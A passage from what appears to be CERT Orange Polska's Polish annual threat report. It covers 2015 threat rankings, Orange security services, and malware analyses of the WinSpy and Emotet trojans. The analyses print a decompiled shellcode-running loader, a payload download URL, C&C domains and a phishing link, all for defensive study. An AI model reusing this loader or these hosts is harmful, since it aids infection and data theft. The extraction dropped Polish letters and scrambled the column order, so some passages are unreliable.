a nawet komunikacj policji i stray poarnej. Najbardziej zaawansowane kraje mog
mie spore problemy zuchronieniem si przed tego typu atakami.
Werner Thalmeier
Director Security Solutions EMEA & CALA
Ajeli nie atak, to moe okup? Kilkukaubiegorocznych przypadkw ransomware,

oprogramowania uzaleniajcego np. odszyfrowanie plikw od zapacenia okupu,
pokazao, e moe si to okaza gronym trendem. Pamitajmy, e dania cyberprzestpcw wcale nie musz by zwizane zkwestiami finansowymi.
Nie wszystkie powysze zagroenia byy jednoczenie wskazywane jako przynoszce najbardziej dokuczliwe inajgroniejsze konsekwencje. Wtej kategorii warto powyej 4,0 osigny pozycje zwizane zatakami na infrastruktur krytyczn bd na dane wraliwe:
cyberkonflikty midzy pastwami powizane zatakami dedykowanymi 4,5,
ataki na systemy sterowania przemysowego (SCADA) 4,33,
wycieki baz danych zawierajcych dane osobowe 4,13,
ataki ukierunkowane na organizacje (APT) 4,13,
ataki na urzdzenia medyczne 4,05.
Najbardziej spektakularne wydarzenia 2014 roku Dragonfly, BlackEnergy, Sandworm, APT28, atak na Sony pobudziy wyobrani internautw. Dodatkowo nasz kraj systematycznie zacz si pojawia winformacjach dotyczcych
najgroniejszych atakw, za konflikt za wschodni granic, w ktrym jestemy postrzegani jako sprzymierzeniec
Ukrainy, sprawi, e rwnie podmioty polskie (komercyjne i zwizane z administracj pastwow) mog si sta
celem wcyberwojnie.
Ocena zarwno prawdopodobiestwa powszechnego wystpienia zagroe, jak iewentualnych skutkw rzeczywistego ich wystpienia, pozwolia na stworzenie prostej analizy ryzyka zagroe w2015 roku. Zgodnie zmetodyk analizy
ryzyka, najgroniejsze s zagroenia, ktrych prawdopodobiestwo wystpienia jest due, aspowodowane przez nie
straty powane.
Ataki na urzdzenia medyczne

Wykorzystanie gier sieciowych w atakach
Zagroenla dla platformy iOS

Zagroenla zwizane z Internet of Things
Kradzie wirtualnych walut
W 2015 roku wedug Fundacji Bezpieczna Cyberprzestrze, ktra przygotowaa

raport o zagroeniach w internecie13, powinnimy si przygotowa na trzy gwne
rodzaje zagroe:
phishing zwykorzystaniem poczty elektronicznej iserwisw WWW 4,6714,
zagroenia dla platformy Android 4,28,
ataki DDoS na podmioty komercyjne 4,28.
Niechlubnym liderem od lat pozostaj akcje phishingowe, cho w ubiegym roku
oceniane byy jako nieco mniej prawdopodobne ryzyko (4,39). Opinia ekspertw potwierdza kontynuacj trendu zwizanego z bardzo systematycznym i trudnym do
wyeliminowania zagroeniem.
Mirosaw Maj
Fundacja Bezpieczna Cyberprzestrze
poziom zagroenia
4,5
Ataki na system DNS

Zagroenia dla platformy Windows Phone/Mobile
Ataki na platformy hostingowe
Ataki na systemy sterowania przemysowego (SCADA)
Zagroenia typu ransomware/scareware

Haktywizm
Zagroenia zwizane z BYOD
3,5
Ataki na cloud-computing
Cyberkonflikty pomidzy pastwami
powizane z atakami dedykowanymi
Powstawanie botnetw opartych

na platformach mobilnych
Zagroenia w serwisach spoecznociowych
Ataki drive-by download
2,5
Ataki DDoS na administracjpubliczn

Akcje cyberszpiegowskie na tle politycznym
To efekt cigego wystpowania saboci wnajpopularniejszych systemach operacyjnych iaplikacjach oraz wci niskiego poziom wiadomoci uytkownikw, nieaktualizujcych systemw istosunkowo atwo ulegajcych socjotechnice.
Infekcje Androida to wrnych statystykach minimum 90 procent wszystkich infekcji
na platformy mobilne. Trend ten systematycznie si utrzymuje inie wida przesanek
zapowiadajcych zmian. Pozostaje mie nadziej, e uytkownicy zaczn bardziej
dba o swoje telefony, przede wszystkim aktualizujc posiadan wersj Androida.
By moe rwnie poprawi si wykrywalno zainfekowanych aplikacji dostpnych
wGoogle Play oraz skuteczno powiadamiania onich.
Rysunek 5. Analiza ryzyka zagroe na 2015 rok wg Fundacji Bezpieczna Cyberprzestrze
Ataki DDoS na podmioty komercyjne to nowa pozycja wnaszym rankingu, dodana

na prob uczestnikw badania. DDoS to jeden znajpowszechniejszych typw ataku wnaszym kraju, wrcz chleb powszedni wielu organizacji komercyjnych (prawdopodobiestwo atakw na podmioty administracji pastwowej zostao ocenione
nieco niej, na 4,1). To ataki trudne do wyeliminowania walka znimi polega przede
wszystkim na skutecznej reakcji imitygacji.
Kluczowe wydaj si zatem zagroenia umieszczone na wykresie wprawym grnym rogu, to jest:
wycieki baz danych zawierajcych dane osobowe, hasa, numery kart kredytowych, itd. (4,22; 4,13),
APT ataki ukierunkowane na organizacje (4,17; 4,13),
akcje cyberszpiegowskie na tle politycznym (4,15; 3,95),
cyberkonflikty pomidzy pastwami powizane zatakami dedykowanymi (np: Stuxnet) (3,65; 4,5),
ataki DDoS na podmioty komercyjne (4,28; 3,58).
Pena wersja raportu, wraz zlist osb biorcych udzia wbadaniu, znajduje si pod adresem:
https://www.cybsecurity.org/wp-content/uploads/2015/01/Raport_FBC_Cyberzagrozenia_2015.pdf
Skala wartociowania wzakresie 1-5
APT ataki ukierunkowane na organizacje
2
2
2,5
3,5
4,5
prawdopodobiestwo wystpienia
Wycieki baz danych zawierajce dane osobowe,

hasa, numry kart kredytowych itd.
Zagroenia dla platformy Android
Ataki DDoS na podmioty komercyjne
Phishing z wykorzystaniem poczty elektronicznej i www
13
42
14
43
10. Komercyjne usugi bezpieczestwa

Orange Polska
10.4 Audyt oraz automatyzacja procesu zarzdzania
bezpieczestwem sieciowym
10.1 DDoS Protection

Monitorowanie wtrybie 24/7/365 ruchu sieciowego klienta
pod ktem ataku DDoS, tj. anomalii mogcych skutkowa
wysyceniem cza i w efekcie utrat cigoci procesw
biznesowych. W przypadku faktycznego ataku nastpuje
eliminacja podejrzanych pakietw, do klienta trafia jedynie prawidowy ruch sieciowy. Usuga pozwala rwnie na
ograniczanie skutkw nowo wystpujcych atakw DDoS
dziki filtrowaniu ruchu klienta za pomoc black iwhite
list oraz korzystaniu zfiltrw tworzonych woparciu obazy
GeoIP.
Za ataki DDoS uwaane s wszczeglnoci nastpujce

zagroenia:
ataki na pasmo potrzebne do wiadczenia usugi,
np. zalanie datagramami ICMP/UDP,
ataki na wyczerpanie zasobw systemu wiadczcego usug, np. zalanie pakietami zflag TCP SYN,
ataki na konkretn aplikacj wykorzystywan do
wiadczenia usugi, np. ataki z wykorzystaniem protokou HTTP (dua ilo sesji imitujcych sesje przegldarki uytkownika), DNS lub protokow aplikacji
VoIP).
10.2 SOC as aService

Monitorowanie wtrybie 24/7/365 przez SOC Orange Polska kluczowych wskazanych przez klienta systemw biznesowych. Systemy monitorowanie s pod ktem zdarze
noszcych znamiona incydentu bezpieczestwa wzakresie ustalonym w umowie z klientem. W ramach usugi
zawarte s:
instalacja rozwizania Security Incident and Event
Monitoring (SIEM) winfrastrukturze klienta,
12
44
rdo: www.cvedetails.com
Elementem usugi moe by Zarzdzanie Zmian wzakresie regu firewall. Na yczenie klienta usuga moe zosta
ograniczona wycznie do audytu urzdze bezpieczestwa sieciowego.
Po uruchomieniu usugi na serwerze zdostpem do infrastruktury klienta moliwy jest audyt regu, atake monitorowanie wczasie rzeczywistym zmian wpolitykach firewalli
z moliwoci natychmiastowej notyfikacji o zmianach,
dokadna analiza i czyszczenie regu oraz raportowanie
oniezgodnociach. Rozwizanie pozwala na analiz urzdze wszystkich liczcych si na rynku producentw urzdze firewall.
10.5 Anty-malware

integracja rde logw,

korelacja zdarze,
monitorowanie zdarze wsystemach klienta,
notyfikacja o naruszeniach bezpieczestwa w trybie
okrelonym wSLA,
dostp do portalu iprocedur obsugi incydentw,
dostpno analitykw i ekspertw w trybie okrelonym wSLA,
raportowanie, administracja iutrzymanie systemu.
10.3 Testy penetracyjne

Przeprowadzenie kontrolowanego ataku na system teleinformatyczny klienta w celu praktycznej oceny biecego
stanu bezpieczestwa systemu, awszczeglnoci obecnoci znanych podatnoci i odpornoci na prby przeamania zabezpiecze. Analiza przeprowadzana zperspektywy potencjalnego wamywacza moe zawiera aktywne
wykorzystywanie podatnoci (np. poprzez uycie exploitw). Wprzeciwiestwie do usug audytu bezpieczestwa
testy penetracyjne nie musz si odbywa wedug sformalizowanej metodologii, ktrej zbudowanie byoby trudne ze
Wramach usugi zawarte s:

efektywne usystematyzowanie wiedzy dotyczcej systemu firewalli uklienta (audyt konfiguracji polityk ochrony),
optymalizacja konfiguracji (optymalizacja wydajnoci,
wykluczenia regu niedozwolonych, pokrywajcych si
oraz niezgodnych zwewntrznymi politykami bezpieczestwa, zaleceniami wynikajcymi z norm, ktrym
podlega organizacja etc.),
efektywna kontrola ochrony poprzez monitorowanie
zmian biecych iregularne, cykliczne audyty polityk.
Wieloprotokoowa analiza ruchu sieciowego wczasie rzeczywistym, obejmujca zachowanie podejrzanego kodu
oraz generowanych pocze callback. Przychodzce
ataki s wykrywane dziki wykorzystaniu rnych technik detekcji, powizanych ze szczegow analiz ataku.
Podejrzane przepywy sieciowe s odtwarzane wmaszynach wirtualnych przeprowadzajcych zaawansowane
analizy zachowania malware w rodowisku symulujcym
realne stacje robocze. Proces opiera si na analizie zachowa kodu na zasadzie bezsygnaturowej, co pozwala obj
niesklasyfikowany wczeniej malware oraz kod wykorzy-
stujcy zaawansowane mechanizmy ukrywania dziaalnoci. Ze wzgldu na natur takich atakw nie ma znanych
wczeniej informacji na ich temat, ktre mogyby zosta
uyte wprocesach korelacji iokrelania reputacji.
Poczenia wychodzce s analizowane pod ktem nieautoryzowanych pocze wiadczcych oobecnoci wsieci komputerw zainfekowanych przed wdroeniem usugi,
poza sieci lub zwykorzystaniem niesieciowych wektorw
ataku (np. infekcja poprzez pendrive USB).
wzgldu na szybko zmieniajcy si stan wiedzy (np. nowe

exploity). Metodyka badania oparta jest na dowiadczeniu
Orange Polska. Nasi testerzy maj certyfikaty potwierdzajce ich kompetencje ietyk: CISSP (Certified Information
Systems Security Professional), CEH (Certified Ethical
Hacker). Testy penetracyjne wykonywane przez Orange
Polska daj klientowi obiektywn i niezalen ocen rzeczywistego poziomu bezpieczestwa jego systemw.
W ofercie znajduj si testy blackbox infrastruktury oraz
aplikacji internetowych.
45
11. Zaczniki
11.1 Zacznik 1. Analiza malware WinSpy (na komputery stacjonarne)
Numer zacznika
Tytu
Zacznik 1
Analiza malware WinSpy (na komputery stacjonarne)
Zacznik 2
Analiza malware Emotet (na komputery stacjonarne)
Zacznik 3
Analiza malware NotCompatible.C (na urzdzenia zsystemem Android)
Zacznik 4
Analiza podatnoci Heartbleed
Zacznik 5
Analiza podatnoci Shellshock
Zacznik 6
Analiza podatnoci Poodle
Zacznik 7
Inne interesujce podatnoci
Przedmiotem analizy by zacznik wiadomoci spamowej rozsyanej losowo do polskich internautw. Jej elementem byo archiwum ZIP o nazwie W_dla_rachunku_2014_09_01.pdf.zip. Zawartoci archiwum by
wykonywalny plik .exe o nazwie dla rachunku 2014 09
01.pdf.exe.
Wmomencie rozpoczcia analizy trojan wraz zprogramem

uruchamiajcym by wykrywany przez 15 z35 sygnaturowych silnikw AV.
Poniej znajduje si lista moduw wykorzystywanych
przez trojana wtrakcie infekowania systemu uytkownika:
1209child_dump
101638299f8db1f722b8b0b860d96633
PE32/EXE 32-bit (GUI)
184KB
1209dmp_dll.dll
4937b8fbc1099b16efde5c9255fce7fb
PE32/DLL 32-bit (GUI)
136KB
bot.exe
0cdd1affd044dfd076d8a28669136788
PE32/DLL 32-bit (GUI)
237.5KB
dla rachunku 2014 09

01.pdf.exe
35926348c1f5366fd06f6a70042e3458
PE32/EXE .NET (GUI)
238.5KB
2014-09-06
14:46:53
2014-09-06
14:46:50
2014-09-12
08:10:32
2014-09-11
09:07:09
Rysunek 6. Lista moduw wykorzystywanych przez trojana
Pierwsza cz aplikacji, napisana w jzyku C# tzw.

loader, jedynie przenoszcy gwn cz trojana powstaa na platformie .Net Framework. Podobn struktur
zesp CERT Orange Polska zaobserwowa podczas analizy niektrych mutacji bankera Tinba. Opisywany przypadek rni jeden szczeg wfunkcjonalnoci malware by
kopiowany wraz z loaderem, natomiast Tinba kopiowa
wirusa do katalogu instalacyjnego bez wykorzystania rodowiska .Net. Opakowanie plikw za pomoc jzykw
prekompilowanych/interpretowanych (C#, Java, VB) ma na
celu utrudnienie analizy, a take ograniczenie moliwoci
wykrycia przez programy antywirusowe.
Dziki opisanej powyej specyfice loader malwareu jest
atwo dekompilowalny.
Analiza dynamiczna tego typu zoliwego oprogramowania
stanowi jedynie wsparcie na pewnych etapach niskopoziomowej analizy wirusa. Najwicej informacji mona uzyska wwyniku statycznej analizy kodu rdowego. Wirus,
eby dziaa potrzebuje specyficznego rodowiska. Uyte
wtym przypadku .NET Framework domylnie instalowane
jest dopiero wsystemie Windows Vista, wic przykadowo
wstandardowej konfiguracji systemu Windows XP bez zainstalowanej platformy .NET wirus nie dziaa.
Kod loadera jest zaciemniony, nazwy wszystkich zmiennych, metod iklas maj posta losow, co utrudnia jego
odczyt bez zastosowania dedykowanych rozwiza i narzdzi.
Dane statyczne zawarte w pliku dla rachunku 2014 09
01.pdf.exe dowodz, e jest to aplikacja stworzona wMicrosoft Visual Studio .NET. Wpolu timestamp znajduje si
informacja oostatniej kompilacji kodu z11 wrzenia 2014
roku zgodziny 09:07:09 GMT. Wzasobach aplikacji wystpuje take informacja owersji.
Manifest pliku PE32 informuje system, e aplikacja nie
prbuje w sposb widoczny dla uytkownika podnosi
uprawnie wsystemie zwczonym mechanizmem UAC15.
Podczas dalszej analizy zaobserwowano rwnie, e nie
prbuje ona nawet obchodzi go w sposb niejawny.
Moe to by kolejny czynnik ograniczajcy dziaanie: jeeli
uytkownik sam nie uruchomi jej zpodniesionymi uprawnieniami, wirus moe nie uzyska wystarczajcych uprawnie dostpu do systemu plikw, rejestru systemowego
i procesw.
>> Rysunek 7.
Rysunek 7.
Manifest pliku malware
46
15
Technologia podwyszonej ochrony wprowadzona w Windows Vista/Windows 7, w zaoeniu ograniczajca dostp aplikacji momentu autoryzacji przez administratora
47
Rysunki 8-9.
Malware bierze si do pracy
Plik wynikowy ma rozmiar 238.50 KB (244224 bytes). Kod

samego loadera skada si zdwch klas oraz zasobw .NET.
Korzysta on z nastpujcych przestrzeni nazw bdcych

czci rodowiska .NET Framework.
System.Reflection;
System.Runtime.CompilerServices;
System.Runtime.InteropServices;
System.Security;
System.Security.Permissions
Metoda Main() wyglda nastpujco
[STAThread]
private static void Main()
{
IntPtr num = Marshal.AllocHGlobal(MAjlWgp.nmsyypaiA.Length);
Marshal.Copy(MAjlWgp.nmsyypaiA, 0, num, MAjlWgp.nmsyypaiA.Length);
RamdomWord1211.rzTjsCDLn(num, (uint) MAjlWgp.nmsyypaiA.Length);
((MAjlWgp.XKqNhVAeTgE) Marshal.GetDelegateForFunctionPointer(num, typeof
(MAjlWgp.XKqNhVAeTgE)))();
}
Rysunki 10-11.
Zoliwe oprogramowanie
uruchamia swj proces
Rysunek 12.
Klucze trojana zapisane
wrejestrze systemowym
Na pocztku alokowana jest pami dynamiczna o wielkoci MAjlWgp.nmsyypaiA.Length (9380 bajty); MajlWgp.
nmsyypaiA skadowa typu byte: klasy MAjlWgp. Jest to
standardowy 32-bitowy shellcode na platformy Intel oraz
AMD.

>> Rysunek 8-9.
Proces potomny kopiuje plik trojana do katalogu systemowego C:\WINDOWS\system32, nadajc mu losow
nazw. Dodaje rwnie klucze do rejestru systemowego,
ktre pozwalaj mu midzy innymi na automatyczne uruchomienie si po starcie systemu operacyjnego.

>> Rysunek 12.
Shellcode jest kopiowany zdanych programu do dynamicznie zaalokowanego obszaru pamici (Marshal.Copy(MAjlWgp.nmsyypaiA, 0, num, MAjlWgp.nmsyypaiA.Length);).
Nastpstwem tego jest wywoanie RandomWord1211.
rzTjsCDLn(num, (uint) MAjlWgp.nmsyypaiA.Length), ktre
de facto jest wywoaniem ZwProtectVirtualMemory, majcym na celu zmian praw dostpu do pamici. W ostatniej linijce metody Main() sterowanie przekazywane jest do
shellcodu.
Gdy sterowanie trafi bezporednio do shellcodu, uruchamiany jest wasny proces jako proces potomny z flag
CREATE_SUSPEND. Nastpnie malware zastpuje wjego
pamici wszystkie sekcje wasnym nagwkiem, kodem
idanymi, po czym docza obraz biblioteki dll, ktra bdzie
wykorzystywana w dalszych etapach. Zostaje rwnie
zmieniony kontekst wykonywania kodu oraz przywrcone
wykonanie gwnego wtku procesu potomnego.

>> Rysunek 10-11.
Nazwy, miejsca docelowe na dysku oraz w rejestrze

mog si rni wzalenoci od wersji procesora (32- lub
64-bitowego), atake systemu operacyjnego.
Trojan wstrzykuje swj kod oraz dane do procesu Explorer.exe oraz tworzy plik *.bat o zawartoci pokazanej na
poprzedniej stronie:

>> Rysunek 13.
Dziaanie skryptu ma na celu usunicie oryginalnego pliku trojana i samego siebie. Po usuniciu plikw proces
potomny koczy swoje dziaanie.
Kod, ktry dziaa w przestrzeni procesu Explorer.exe,
deszyfruje swoje dane w pamici za pomoc prostego
algorytmu bazujcego na rnicy symetrycznej zkluczem
0x1251a373.
Po odszyfrowaniu danych pobiera adresy potrzebnych mu
procedur, po czym przechodzi do wykonania swoich funkcji.
Rysunek 13.
Plik *.bat tworzony przez trojana
48
49
Rysunek 14.
Malware nie zdoa utworzy
mutexu
Rysunki 15-17.
Malware wakcji
Malware prbuje utworzy mutex o nazwie {ED2901616882-A702-DA71-1ccBAE35102f}.

W przypadku, gdy prba ta si nie powiedzie, aplikacja
przez wywoanie zmodyfikowanej funkcji ExitThread zaczyna
wykonywa pust, niekoczc si ptl. Wefekcie przestaje wykonywa swoje zoliwe funkcje, poniewa urzdzenie
docelowe nie spenia zakadanych warunkw do infekcji.

>> Rysunek 14.
Jeli utworzenie mutexu si powiedzie, trojan zaczyna rejestrowa aktywno klawiatury powizan zkonkretn aplikacj. Zapisuje take do plikw tymczasowych informacje
uwierzytelniajce na stronach www, np. cookie, identyfikatory oraz adresy stron. Nastpnie archiwizuje dane
w plikach *.cab, nadaje im rozszerzenie *.tmp, po czym
uruchamia wtek odpowiedzialny za czno z kanaem
Command&Control.

>> Rysunek 15-17.
Wtek wysya dania HTTP do moduu uploadu plikw
po stronie serwera Command&Control, zawierajce szereg
parametrw identyfikujcych zainfekowan maszyn oraz
wspomniane pliki archiww.
Opisywana wczeniej biblioteka dll jest uruchamiana
w pamici procesu macierzystego, w zwizku z czym
nie jest pokazywana na licie moduw zaadowanych do
pamici procesu. Zawiera szereg procedur rozszerzajcych
funkcjonalnoci malwareu i jest adowana do wszystkich
nowo powstaych procesw. Wykonanie kodu biblioteki dll
zaczyna si od odszyfrowania danych. Wykorzystywana

jest procedura bazujca na instrukcji XOR identyczna jak
ta, ktra odszyfrowuje dane w jednym z wtkw trojana
wprzestrzeni procesu Explorer.exe.
Po odszyfrowaniu danych trojan sprawdza, czy wsystemie
jest obecny folder wlokalizacji
%APPDATA%\Microsoft\{775CD561-6A0F-C1F7-2C9B3E8520FF5289}\
Naley jednak pamita, e wnazwy katalogw oraz kluczy wrejestrze za kadym razem s inne. Jeeli szukany
folder istnieje, aplikacja tworzy archiwum ze znajdujcych
si wnim plikw, anastpnie przesya je do zdalnego serwera Command&Control. Jeeli folder nie istnieje, zostaje
utworzony i przechowywane s w nim pliki zawierajce
informacje znalezione w systemie operacyjnym uytkownika.

>> Rysunek 18.
Modu tworzy rwnie klucz rejestru
HKCU\Software\AppDataLow\775CD561-6A0F-C1F7-2C9B-3E8520FF5289\Files
oraz modyfikuje procedury systemowe CreateProcessA
iCreateProcessW wprzestrzeni procesu, wktrym dziaa. W przypadku procesu Explorer.exe daje to moliwo
kontrolowania i modyfikowania wszystkich aplikacji uruchamianych przez uytkownika.
Rysunek 18.
Pliki wfolderze zakadanym
przez malware
50
51
Rysunek 19.
Funkcjonalnoci opisywanego
malware
Rysunek 20.
Dane gromadzone przez malware
Rysunek 21.
Prba wysyki wykradzionych
danych
Kolejn zfunkcjonalnoci omawianej biblioteki jest usuwanie

z cache przegldarki adresw serwerw Command&Control oraz uruchamianie i komunikacja z innymi aplikacjami
za pomoc potokw nazwanych. Modu wyszukuje rwnie
w rejestrze systemowym i plikach konfiguracyjnych dane
autoryzacyjne do serwerw pocztowych, poza tym zawiera
w sobie procedury odpowiedzialne za kradzie kontaktw
odklientw pocztowych wsystemie Windows oraz wykrada dane zaplikacji Lotus WordPro. Malware gromadzi take
dane osystemie operacyjnym uytkownika.

>> Rysunek 19-20.
Wszystkie zgromadzone przez Trojana dane s cyklicznie
pakowane do archiww *.cab, anastpnie przesyane na
serwer zdalny.

>> Rysunek 21.
Domeny iadresy IP powizane zinfekcj systemu:
46.30.42.166 serwer zktrego pobierane s aktualizacje
oraz pliki binarne http://46.30.42.166/1/bot.exe.
donkixot17.net serwer Command&Control, do ktrego
przesyane s wykradzione dane.
donkixot17.ru alternatywna domena Command&Control.
95.183.8.24 serwer alternatywny, z ktrego pobierane
s pliki binarne.
Klucze rejestru powizane ztrojanem:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
<losowa_nazwa>=C:\WINDOWS\system32\<losowa_
nazwa>.exe
HKCU\E15E01AE-8A43-A415-7224-33F6EF98178A
(gdzie E15E01AE-8A43-A415-7224-33F6EF98178A
52
to warto losowa)
Install=<warto binarna>
HKCU\Software\AppDataLow\E15E01AE-8A43-A415-7224-33F6EF98178A
HKCU\Software\AppDataLow\E15E01AE-8A43-A415-7224-33F6EF98178A\Files
<losowe_nazwy> = <wartoci binarne>
Pliki powizane ztrojanem:
dla rachunku 2014 09 01.pdf.exe Loader stworzony
w.NET C#.
1209child_dump proces potomny.
bot.exe aktualizacja pobierana zserwera zdalnego.
1209dmp_dll.dll biblioteka wspdzielona wykorzystywana przez zainfekowany proces Explorer.exe
Podsumowanie
Jedn zfunkcji opisywanego malwareujest rejestrowanie
generowanych przez uytkownika nacini klawiszy. Gromadzi on take informacje osystemie operacyjnym, ktry
zainfekowa, wykrada dane uwierzytelniajce do serwerw
pocztowych, stron www, ksiki adresowe od klientw
pocztowych dziaajcych na systemach Windows, atake
informacje zwizane z aplikacj Lotus WordPro. Nastpnie przesya wszystko do serwera kontrolowanego przez
cyberprzestpcw. Trojan infekuje take wszystkie nowo
powstae procesy w systemie uytkownika, porozumiewa si z innymi uruchomionymi przez siebie aplikacjami
za pomoc potokw nazwanych, modyfikuje procedury
bibliotek systemowych oraz pobiera iuruchamia inne pliki
wykonywalne.
53
Rysunek 22.
Podejrzana wiadomo e-mail
11.2 Zacznik 2. Analiza malware Emotet (na komputery stacjonarne)

Trojan bankowy Emotet zosta zauwaony wdrugiej poowie 2014 roku i od tego czasu zdaje si by cyklicznie
wykorzystywany w kampanii phishingowej, ktrej celem
jest zainfekowanie komputerw uytkownikw tego typu
zoliwym oprogramowaniem, a w konsekwencji kradzie
wraliwych danych oraz rodkw zkont bankowych.
Rysunek 23.
Rachunek okazuje si plikiem exe
Rysunki 24, 25.
Malware zaczyna dziaa
Rysunki 26-27.
Dalszy cig inicjalizacji
Prbka, ktra dotara do CERT Orange Polska 7 listopada,

rni si od opisywanych ju wsieci wariantw tego trojana tym, e zosta wniej zaimplementowany algorytm DGA.
Nie zmienia si natomiast forma propagacji wtym przypadku rwnie by to e-mail wjzyku niemieckim wysany
zsieci typu botnet ipodszywajcy si pod T-online. Cele
trojana badanego przez CERT Orange Polska wydaj si
niezmienione nadal s to klienci niemieckiej bankowoci
internetowej.
Metoda infekcji
Na skrzynk pocztow uytkownika, z reguy w okresie
rozlicze (koniec/pocztek miesica), trafia e-mail rzekomo
pochodzcy od ktrego z operatorw telekomunikacyjnych, nakaniajcy uytkownikw do kliknicia wlink wcelu
pobrania archiwum .zip, pod pretekstem pobrania danych
zwizanych zrachunkiem telefonicznym za biecy miesic.

>> Rysunek 22.
Link prowadzi do adresu http://nitobreapadel.com.ar/
EQMqdL9nvk, pod ktrym znajduje si archiwum zip,
wktrym zkolei znajduje si plik wykonywalny zrozszerzeniem .pdf.exe oraz zmienion ikon imitujc dokument pdf.

>> Rysunek 23.
Rysunek 28.
Skrypt sprztajcy widoczne
pozostaoci trojana
Rysunki 29-30.
Od tego momentu wszystkie
uruchamiane aplikacje bd
infekowane
Po klikniciu wfaszywy dokument pdf system operacyjny

uytkownika zostaje zainfekowany.
Sposb dziaania
Analizowan prbk mona podzieli na dwie zasadnicze
czci oraz moduy dodatkowe. Loader to cz odpowiedzialna za kopiowanie pliku do folderu docelowego
oraz zaadowanie gwnego moduu do przestrzeni innego
procesu. Modu gwny odpowiedzialny jest za infekowanie innych procesw, komunikacj sieciow, pobieranie
iwysyanie danych oraz moduw dodatkowych.
Kod oraz dane trojana s dwukrotnie zaszyfrowane. Korzysta on take zkryptografii zkluczem publicznym oraz wykorzystuje wywoania API zbdnymi parametrami (ma to na
celu m.in. oszukanie emulatorw). Ten ostatni mechanizm
by wykorzystywany take wtrojanie carberp, wtym
54
przypadku jednak parametry przekazywane do funkcji

wydaj si nieco bardziej przemylane iwpierwszej chwili mog zmusza do zastanowienia, czego efektem jest
wyduenie czasu niezbdnego do efektywnej analizy.
Po uruchomieniu Emotet alokuje pami dynamiczn wielkoci rozmiaru sekcji .data pomniejszonego o4 bajty.
Nastpnie kopiuje do niej odszyfrowany kod i przekazuje
sterowanie.

>> Rysunek 24-25.
Na tym etapie loader inicjalizuje swoje rodowisko, pobiera
adresy potrzebnych mu bibliotek ifunkcji, po czym zmienia
uprawnienia dostpu do pamici, tworzy nowy nagwek
oraz sekcje pliku wykonywalnego, do ktrych kopiowane
s odszyfrowane dane oraz kod trojana. Wtym momencie
sterowanie przekazywane jest do prawdziwej funkcji gwnej loadera.

>> Rysunek 26-27.
Emotet w funkcji gwnej loadera tworzy wpis w kluczu rejestru pozwalajcym na jego autouruchomienie po
restarcie systemu oraz sprawdza, czy istnieje jego kopia
wlokalizacji docelowej. Jeeli plik nie istnieje wokrelonym
katalogu, zostaje tam skopiowany.
Nastpnie trojan nadaje sobie uprawnienie SeDebugPrivilege, pozwalajce na dostp do pamici innych procesw w systemie uytkownika oraz tworzy wtek zdalny
infekujcy proces Explorer.exe. Wkocowej fazie dziaania
loadera tworzony iuruchamiany jest skrypt wsadowy usuwajcy plik trojana zlokalizacji, zktrej zosta uruchomiony.

>> Rysunek 28.
Wzainfekowanym procesie Explorer trojan modyfikuje procedur systemow ZwResumeThread. Modyfikacja ta jest
wykorzystywana do infekowania wszystkich nowo uruchamianych aplikacji wsystemie operacyjnym uytkownika.

>> Rysunek 29-30.
Emotet infekuje rwnie wszystkie aktualnie uruchomione
procesy wsystemie operacyjnym, do ktrych ma uprawnienia. Tworzy te klucze rejestru, w ktrych przechowywane bd dane pobrane z serwerw C and C oraz
informacje skradzione z systemu uytkownika. Nastpnie
trojan pobiera informacje o systemie operacyjnym oraz
tworzy klucze szyfrowania na podstawie wasnego klucza publicznego. Trojan sprawdza dostpno poczenia
internetowego do momentu, wktrym otrzyma odpowied
na danie HTTP skierowane do witryny www.microsoft.com.
55
Rysunki 31-32.
Trojan Emotet wykorzystuje
algorytm generowania domen
(DGA)
Wprzypadku, gdy poczenie jest dostpne, Emotet tworzy 16 wtkw odpowiedzialnych za generowanie nazw
domenowych. Algorytm DGA wykorzystywany przez trojana bazuje na wartociach uzyskanych wwyniku wywoa
SystemTimeToFileTime iRtlTimeToSecondsSince1970.

>> Rysunek 31-32.
Poprawno domeny weryfikowana jest przez wywoanie
procedury DnsQuery_A.
Wmomencie prowadzenia analizy niektre ztych domen
byy sinkholowane. Implementacja tego typu algorytmw
przyczynia si z reguy do podniesienia ywotnoci sieci
botnet stworzonej na bazie danego typu zoliwego oprogramowania. Znacznie trudniej blokowa na poziomie sieciowym ruch generowany w ten sposb oraz namierzy
serwer C&C zwaszcza wprzypadku, gdy domeny generowane przez DGA peni wycznie rol proxy.

>> Rysunek 33.
Rysunek 33.
Charakterystyczny bekot
wnazwach domen
wygenerowanych
przy uyciu DGA
Rysunek 34.
Analizowana wersja trojana bya
zbudowana pod ktem rynku
niemieckiego
Rysunek 35.
Emotet potrafi wniezauwaalny
sposb przechwytywa ruch SSL
56
Wprzypadku wygenerowania poprawnej nazwy domenowej aktywnego serwera Command&Control trojan zaczyna szyfrowa dane, uywajc algorytmu RC4, nastpnie
dodaje do nich podpis cyfrowy iprzesya za pomoc dania HTTP do serwera zdalnego.
Po otrzymaniu odpowiedzi Emotet weryfikuje poprawno
jej podpisu cyfrowego (pierwsze 128 bajtw odpowiedzi).
Jeli sygnatura jest poprawna, trojan odszyfrowuje dane
otrzymane zserwera. Wdanych tych poza sygnatur znajduje si modu .dll oraz dane konfiguracyjne wykorzystywane przez ten modu, ktre zawieraj list instytucji finansowych bdcych celem cyberprzestpcw.

>> Rysunek 34.
Dane te s nastpnie kodowane za pomoc instrukcji XOR
i zapisywane w rejestrze systemu operacyjnego. Modu
dll odebrany zserwera C&C adowany jest do wszystkich
procesw, do ktrych Emotet ma uprawnienia. W analizowanym przez nas wariancie zajmuje si rwnie prze-
chwytywaniem komunikacji sieciowej kierowanej do instytucji finansowych, ktrych lista zostaa pobrana zserwera
C&C izapisana wrejestrze. Ponadto omawiana biblioteka
modyfikuje niektre funkcje przegldarek internetowych
takich jak Google Chrome, Firefox czy internet Explorer, co
umoliwia jej przechwytywanie w sposb niezauwaalny
dla uytkownika zaszyfrowanego ruchu sieciowego (np. za
pomoc protokou SSL).

>> Rysunek 35.
Przechwycone wten sposb dane s kodowane, zapisywane wrejestrze systemowym oraz cyklicznie wysyane na
serwer kontrolowany przez cyberprzestpcw.

>> Rysunek 36.
Podsumowanie irekomendacje
Emotet to stosunkowo nowe zagroenie, ktre zmienia nieco podejcie do kradziey danych finansowych. Zamiast
tradycyjnego modyfikowania kontentu wybranej strony
internetowej wykorzystuje przechwytywanie caej komunikacji sieciowej zokrelonym bankiem niezalenie od tego,
czy jest ona szyfrowana czy nie. Ponadto, wodrnieniu
